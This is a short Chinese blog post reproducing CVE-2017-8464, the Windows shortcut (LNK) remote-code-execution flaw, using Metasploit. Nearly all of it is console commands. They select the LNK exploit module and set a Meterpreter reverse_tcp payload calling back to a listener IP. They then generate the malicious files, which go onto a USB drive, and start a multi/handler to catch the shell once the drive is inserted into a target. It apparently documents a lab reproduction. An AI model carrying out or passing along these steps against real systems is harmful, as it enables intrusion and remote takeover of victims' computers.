码迷,mamicode.com
首页 > 其他好文 > 详细

CVE-2017-8464(震网三代)复现

时间:2017-11-05 16:31:50      阅读:210      评论:0      收藏:0      [点我收藏+]

标签:文件的   cal   host   生成文件   oca   show   cve   hand   image   

开启msf

root@sch01ar:~# msfconsole

 设置模块

msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce

 设置payload

msf exploit(cve_2017_8464_lnk_rce) > set payload windows/x64/meterpreter/reverse_tcp

 show options

技术分享

设置监听的ip

msf exploit(cve_2017_8464_lnk_rce) > set lhost 192.168.220.131

 生成文件

msf exploit(cve_2017_8464_lnk_rce) > exploit

 技术分享

打开文件的文件夹

root@sch01ar:~# xdg-open /root/.msf4/local

 技术分享

把这些复制到U盘里,开启监听

msf exploit(cve_2017_8464_lnk_rce) > use multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.220.131
msf exploit(handler) > exploit

 把U盘插到目标主机

技术分享

技术分享

技术分享

 

CVE-2017-8464(震网三代)复现

标签:文件的   cal   host   生成文件   oca   show   cve   hand   image   

原文地址:http://www.cnblogs.com/sch01ar/p/7787682.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!